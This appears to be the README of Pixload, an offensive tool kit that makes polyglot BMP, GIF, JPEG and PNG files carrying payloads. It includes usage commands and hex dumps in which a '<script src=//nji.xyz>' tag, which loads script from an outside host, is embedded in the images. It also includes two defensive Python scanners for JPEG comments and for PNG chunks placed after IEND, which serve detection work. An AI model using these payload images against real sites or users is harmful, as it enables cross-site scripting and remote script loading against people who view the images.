Pixload : Image Payload Creating/Injecting Tools

Pixload is a set of tools for creating/injecting payload into images. Useful references for better understanding of pixload and its use-cases:

If you want to encode a payload in such a way that the resulting binary blob is both valid x86 shellcode and a valid image file, I recommend looking here and here.


SETUP

The following Perl modules are required:

  • GD
  • Image::ExifTool
  • String::CRC32

On Debian-based systems install these packages:

sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl

On OSX, please refer to this workaround (thanks to @iosdec).

TOOLS

bmp.pl

BMP Payload Creator/Injector.

Usage

./bmp.pl [-payload 'STRING'] -output payload.bmp

If the output file already exists, the payload is injected into that file; otherwise a new file is created.

Example

./bmp.pl -output payload.bmp
[>| BMP Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload

[>] Generating output file
[✔] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1

00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;<script src=/|

gif.pl

GIF Payload Creator/Injector.

Usage

./gif.pl [-payload 'STRING'] -output payload.gif

If the output file already exists, the payload is injected into that file; otherwise a new file is generated.

Example

./gif.pl -output payload.gif
[>| GIF Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload

[>] Generating output file
[✔] File saved to: payload.gif

[>] Injecting payload into payload.gif
[✔] Payload was injected successfully

payload.gif: GIF image data, version 87a, 10799 x 32

00000000 47 49 46 38 37 61 2f 2a 20 00 80 00 00 04 02 04 |GIF87a/* .......|
00000010 00 00 00 2c 00 00 00 00 20 00 20 00 00 02 1e 84 |...,.... . .....|
00000020 8f a9 cb ed 0f a3 9c b4 da 8b b3 de bc fb 0f 86 |................|
00000030 e2 48 96 e6 89 a6 ea ca b6 ee 0b 9b 05 00 3b 2a |.H............;*|
00000040 2f 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d |/=1;<script src=|

jpg.pl

JPG Payload Creator/Injector.

Usage

./jpg.pl [-payload 'STRING'] -output payload.jpg

If the output file already exists, the payload is injected into that file; otherwise a new file is created.

Example

./jpg.pl -output payload.jpg
[>| JPEG Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload

[>] Generating output file
[✔] File saved to: payload.jpg

[>] Injecting payload into comment tag
[✔] Payload was injected successfully

payload.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "", baseline, precision 8, 32x32, components 3

00000000 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 |......JFIF.....`|
00000010 00 60 00 00 ff fe 00 21 3c 73 63 72 69 70 74 20 |.`.....!<script |
00000020 73 72 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f |src=//nji.xyz></|
00000030 73 63 72 69 70 74 3e ff db 00 43 00 08 06 06 07 |script>...C.....|
00000040 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b |................|
00000050 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 |.............. $|
00000060 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 |.' ",#..(7),0144|
00000070 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 |4.'9=82<.342...C|
00000080 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 |...........2!.!2|
00000090 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 |2222222222222222|
*
000002a6
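A defender-side check for the JPEG case above, added here as an example and not part of pixload: a marker walker that lists every COM (FF FE) segment, the segment the tool writes into, together with its file offset. The sample is constructed inline; it reuses the JFIF APP0 bytes from the dump, and the comment text is a placeholder rather than the page's payload.

```python
import struct

def iter_jpeg_segments(blob: bytes):
    """Yield (marker, offset, payload) for each marker segment up to SOS or EOI."""
    if blob[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 2 <= len(blob):
        if blob[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos:#x}")
        marker = blob[pos + 1]
        if marker == 0xFF:                            # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                            # EOI: nothing follows
            return
        if 0xD0 <= marker <= 0xD8 or marker == 0x01:  # standalone markers carry no length
            pos += 2
            continue
        if pos + 4 > len(blob):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", blob[pos + 2:pos + 4])[0]  # includes its own 2 bytes
        yield marker, pos, blob[pos + 4:pos + 2 + length]
        if marker == 0xDA:                            # SOS: entropy-coded data follows
            return
        pos += 2 + length

def find_comments(blob: bytes) -> list:
    """Return (offset, text) for every COM (FF FE) segment, the place pixload writes to."""
    return [(off, data.decode("latin-1"))
            for marker, off, data in iter_jpeg_segments(blob) if marker == 0xFE]

def build_sample() -> bytes:
    """Constructed JPEG prefix: SOI, the JFIF APP0 bytes from the dump above, a COM, EOI."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
    text = b"constructed comment"                     # placeholder, not the page's payload
    com = b"\xff\xfe" + struct.pack(">H", len(text) + 2) + text
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"
```

Any comment text that looks like markup or script, as in the dump above, is a strong reason to re-encode the image before serving it.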

png.pl

PNG Payload Creator/Injector.

Usage

./png.pl [-payload 'STRING'] -output payload.png

If the output file already exists, the payload is injected into that file; otherwise a new file is created.

Example

./png.pl -output payload.png
[>| PNG Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload

[>] Generating output file
[✔] File saved to: payload.png

[>] Injecting payload into payload.png
[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND

[>] Inject payload to the new chunk: 'pUnk'
[✔] Payload was injected successfully

payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced

00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR|
00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |... ... ........|
00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |.....pHYs.......|
00000030 c4 01 95 2b 0e 1b 00 00 00 19 49 44 41 54 48 89 |...+......IDATH.|
00000040 ed c1 31 01 00 00 00 c2 a0 f5 4f ed 61 0d a0 00 |..1.......O.a...|
00000050 00 00 6e 0c 20 00 01 c8 a2 88 fe 00 00 00 00 49 |..n. ..........I|
00000060 45 4e 44 ae 42 60 82 00 00 00 00 00 00 00 00 00 |END.B`..........|
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000000c0 00 1f 70 55 6e 6b 3c 73 63 72 69 70 74 20 73 72 |..pUnk<script sr|
000000d0 63 3d 2f 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 |c=//nji.xyz></sc|
000000e0 72 69 70 74 3e 9d 11 54 97 00 49 45 4e 44 |ript>..T..IEND|
000000ee
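A defender-side counterpart to the PNG chunk listing above, added here as an example and not pixload's code: a chunk walker that verifies every CRC, flags chunk types the PNG specification does not define, and keeps reading past IEND, which is where a viewer stops but where the injected 'pUnk' chunk in the dump sits. The 1x1 PNG and the appended chunk are constructed inline with placeholder text.

```python
import struct
import zlib
PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification; anything else deserves a look.
KNOWN = {"IHDR", "PLTE", "IDAT", "IEND", "tRNS", "cHRM", "gAMA", "iCCP", "sBIT",
         "sRGB", "tEXt", "zTXt", "iTXt", "bKGD", "hIST", "pHYs", "sPLT", "tIME"}

def chunk(ctype: bytes, data: bytes) -> bytes:  # length, type, data, CRC32(type + data)
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))

def scan_png(blob: bytes) -> dict:
    """Walk every chunk, including anything placed after IEND, and report oddities."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    rep = {"chunks": [], "unknown": [], "bad_crc": [], "after_iend": [], "slack": 0}
    pos, past_iend = len(PNG_SIG), False
    while pos + 12 <= len(blob):
        if past_iend:
            # Decoders stop at IEND; hunt for the next plausible header (length + 4-letter type).
            start = pos
            while pos + 12 <= len(blob) and not blob[pos + 4:pos + 8].isalpha():
                pos += 1
            rep["slack"] += pos - start
            if pos + 12 > len(blob):
                break
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        crc_off = pos + 8 + length
        if crc_off + 4 > len(blob):  # declared length runs past the file: truncated chunk
            break
        name, data = ctype.decode("ascii", "replace"), blob[pos + 8:crc_off]
        stored = struct.unpack(">I", blob[crc_off:crc_off + 4])[0]
        rep["chunks"].append((name, length))
        if zlib.crc32(ctype + data) != stored:
            rep["bad_crc"].append(name)
        if name not in KNOWN:
            rep["unknown"].append(name)
        if past_iend:
            rep["after_iend"].append(name)
        past_iend = past_iend or name == "IEND"
        pos = crc_off + 4
    rep["slack"] += len(blob) - pos  # whatever could not be parsed as a chunk
    return rep

def build_samples() -> tuple:
    """Constructed 1x1 RGB PNG, plus the same bytes with a 'pUnk' chunk after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel
    clean = PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")
    # Placeholder text stands in for an injected payload; padding mimics the dump above.
    return clean, clean + b"\x00" * 16 + chunk(b"pUnk", b"PAYLOAD-PLACEHOLDER")
```

Note that the injected chunk carries a valid CRC, so a CRC check alone is not enough; the useful signals are the unregistered chunk type and any data after IEND.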

DISCLAIMER

The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

R K
